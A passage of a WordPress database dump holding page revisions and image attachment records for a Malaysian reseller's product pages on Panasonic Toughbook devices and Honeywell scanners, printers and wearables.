11:23:14','',1633,'https://bintara.com.my/blog/2018/12/13/1633-revision-v1/',0,'revision','',0),(2857,1,'2019-02-07 16:29:51','2019-02-07 08:29:51','','752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40','','inherit','closed','closed','','752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_evolve_40','','','2019-02-07 16:29:51','2019-02-07 08:29:51','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png',0,'attachment','image/png',0),(2858,1,'2019-02-07 16:30:38','2019-02-07 08:30:38','','Evolve_30_','','inherit','closed','closed','','evolve_30_','','','2019-02-07 16:30:38','2019-02-07 08:30:38','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png',0,'attachment','image/png',0),(2045,1,'2018-12-13 20:01:03','2018-12-13 12:01:03','.project-4-column .project-item { width: 16.6% ; }\n\n.project-wrapper .project-header .project-small-title { font-size: 10px; } ','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-13 20:01:03','2018-12-13 12:01:03','',1980,'https://bintara.com.my/blog/2018/12/13/1980-revision-v1/',0,'revision','',0),(2195,1,'2018-12-14 16:04:08','2018-12-14 08:04:08','','Image-2a_1_0','','inherit','closed','closed','','image-2a_1_0','','','2018-12-14 16:04:08','2018-12-14 08:04:08','',1571,'https://bintara.com.my/wp-content/uploads/2018/12/Image-2a_1_0.jpg',0,'attachment','image/jpeg',0),(2047,1,'2018-12-13 20:26:43','2018-12-13 12:26:43','<h3>Toughbook and Toughpad Range</h3>\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nWhatever your sector, whatever your challenge, whatever your working conditions, there will be a Toughbook solution for you, ranging from the ultra-durability of our fully ruggedised Toughbook and Toughpad devices through to our super stylish Toughpad 4K. All models are designed for your needs with the latest technologies and are capable of withstanding the conditions you operate in and can help you go further, achieve more and transform the way you work.\r\n<h5>The Fully Rugged Toughbook models meet the demands of the most challenging working environments</h5>\r\nThe fully rugged Toughbook models are dust, water, vibration and drop proof from a height of up to 180cm. The Toughbook range is designed to operate in both extremely low and high temperatures, and come in a variety of formats from laptop to tablet.\r\n\r\nAs well as being resistant to hostile and demanding environments such as construction sites, hospitals, underground excavations, emergency situations encountered by the emergency services, airline maintenance and management, utility services maintenance, and transport, they offer daylight visible screens, excellent graphics and long battery life. The fully rugged Toughbook models can meet almost every challenge business, utility or military service can deliver and ensure that mobile workers can access volumes of data and deliver information in real time wherever they are, increasing efficiency and productivity.\r\n<h5>The Semi Rugged and Business Ruggedised Toughbook models</h5>\r\n<a href=\"https://business.panasonic.com.my/computer-product/products-and-accessories/introducing-the-full-toughbook-range/semi-ruggedized-notebooks\">Semi Rugged Toughbook models</a>Â are water resistant and capable of withstanding being dropped* with a toughened casing. Semi Rugged notebook and convertible tablet models mean these mobile business computing solutions support workers in the field in diverse circumstances such as enabling police officers to take witness statements electronically, telephone engineers to work more effectively across the network and business travelers to effectively deliver presentations using the flip screen technology of the CF-C2.\r\n\r\nLong battery life, optional GPS and the option of technology that allows batteries to be changed whilst working, mean there is a model of semi rugged Toughbook suitable for every business that needs robust mobile computing solutions.\r\n\r\nThe Toughbook flip over business ruggedisedÂ <a href=\"https://business.panasonic.com.my/computer-product/business-ruggedized/cf-mx4\">CF-MX4</a>Â is light, with an attractive design making it perfect for the busy business traveler allowing them to keep in touch with the office and work effectively on the move. The Toughbook is resistant to being dropped,* and withstands 100kg/f pressure, providing business travelers a robust alternative to more fragile mobile computing options.\r\n<h6>*From a height of 76cm.</h6>\r\n&nbsp;\r\n<h5>Computer docking solutions and accessories make Toughbook and Toughpad versatile and convenient</h5>\r\nWe offer a range of docking solutions, car chargers, battery chargers, bags, carrying straps and other accessories to ensure your business gets optimum performance from your Panasonic Toughbook and Toughpad devices. Click the link below to find out more about what is available.\r\n<h5>Professional Services to help you manage Toughbook and Toughpad hardware</h5>\r\nPanasonic is committed to providing you with the right computer product solution for your business. This is reflected in the range of professional services we offer. We can help with deployment to your workforce ensuring they have all the tools they need to work effectively and offer a buy-back programme for larger customers, to help you manage your investment in mobile working.\r\n\r\nTo discover more about the Toughbook and Toughpad range, please click the buttons below or contact us to discuss your needs.\r\n\r\n</div>\r\n</div>\r\n</div>','Panasonic Toughbook','','inherit','closed','closed','','1571-revision-v1','','','2018-12-13 20:26:43','2018-12-13 12:26:43','',1571,'https://bintara.com.my/blog/2018/12/13/1571-revision-v1/',0,'revision','',0),(2048,1,'2018-12-13 21:18:40','2018-12-13 13:18:40','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table class=\"clearfix entry-content\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Printers and Media</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons, software.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Wearable Devices</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>OEM Scan Engines, Decoders &amp; Modules</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\"/></td>\r\n      <td>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>RFID Solution</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</td>\r\n      <td width=\"20%\"><img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\"/></td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<p>To discover more product, please click the button below or contact us to discuss your needs.</p>\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Honeywell','','publish','closed','closed','','honeywell','','','2019-10-01 09:32:17','2019-10-01 01:32:17','',0,'https://bintara.com.my/?page_id=2048',0,'page','',0),(2049,1,'2018-12-13 20:43:33','2018-12-13 12:43:33','','comp device','','inherit','closed','closed','','comp-device','','','2018-12-13 20:43:33','2018-12-13 12:43:33','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg',0,'attachment','image/jpeg',0),(2050,1,'2018-12-13 20:43:34','2018-12-13 12:43:34','','printer','','inherit','closed','closed','','printer-2','','','2018-12-13 20:43:34','2018-12-13 12:43:34','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg',0,'attachment','image/jpeg',0),(2051,1,'2018-12-13 20:43:35','2018-12-13 12:43:35','','scanning','','inherit','closed','closed','','scanning','','','2018-12-13 20:43:35','2018-12-13 12:43:35','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg',0,'attachment','image/jpeg',0),(2052,1,'2018-12-13 20:43:36','2018-12-13 12:43:36','','wearable device','','inherit','closed','closed','','wearable-device','','','2018-12-13 20:43:36','2018-12-13 12:43:36','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg',0,'attachment','image/jpeg',0),(2053,1,'2018-12-13 20:45:19','2018-12-13 12:45:19','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"alignnone size-full wp-image-2051\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:45:19','2018-12-13 12:45:19','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(3587,1,'2019-09-30 16:59:57','2019-09-30 08:59:57','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"1\" cellpadding=\"10\">\r\n  <tbody>\r\n    <tr>\r\n      <td colspan=\"2\"><h4>Scanning</h4></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 16:59:57','2019-09-30 08:59:57','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(2054,1,'2018-12-13 20:51:07','2018-12-13 12:51:07','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"alignnone size-full wp-image-2051\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2049\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2052\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:51:07','2018-12-13 12:51:07','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2055,1,'2018-12-13 20:53:58','2018-12-13 12:53:58','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div></div>\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:53:58','2018-12-13 12:53:58','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2057,1,'2018-12-13 20:55:31','2018-12-13 12:55:31','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"alignnone  wp-image-2051\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"191\" height=\"191\" />\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2049\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2052\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:55:31','2018-12-13 12:55:31','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2056,1,'2018-12-13 20:54:26','2018-12-13 12:54:26','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div></div>\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 alignright\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2050 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2052 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:54:26','2018-12-13 12:54:26','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2058,1,'2018-12-13 20:57:06','2018-12-13 12:57:06','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"alignnone size-full wp-image-2051\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2049\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2052\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:57:06','2018-12-13 12:57:06','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2059,1,'2018-12-13 20:57:27','2018-12-13 12:57:27','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: left;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2049\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2052\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:57:27','2018-12-13 12:57:27','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2060,1,'2018-12-13 20:57:56','2018-12-13 12:57:56','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: center;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\" style=\"text-align: center;\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2049\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Computer Device</strong></div>\r\n<div>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2050\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Printers and MediaÂ </strong></div>\r\n<div>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</div>\r\n<div></div>\r\n<div><img class=\"alignnone size-full wp-image-2052\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div><strong>Wearable Devices</strong></div>\r\n<div>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeyw','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 20:57:56','2018-12-13 12:57:56','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2068,1,'2018-12-13 21:13:01','2018-12-13 13:13:01','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\" wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 21:13:01','2018-12-13 13:13:01','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2061,1,'2018-12-13 20:58:56','2018-12-13 12:58:56','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"size-full wp-image-2051 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"250\" height=\"250\" />\r\n<div style=\"text-align: center;\"><strong>Scanning</strong></div>\r\n<div class=\"score-highlight-body\" style=\"text-align: center;\">From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</div>\r\n<div></div>\r\n<div><img class=\"size-full wp-image-2049 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"250\" height=\"250\" /></div>\r\n<div></div>\r\n<div style=\"text-align: center;\"><strong>Computer Device</strong></div>\r\n<div style=\"text-align: center;\">Honeywell offers a broad array of durable mobile computers 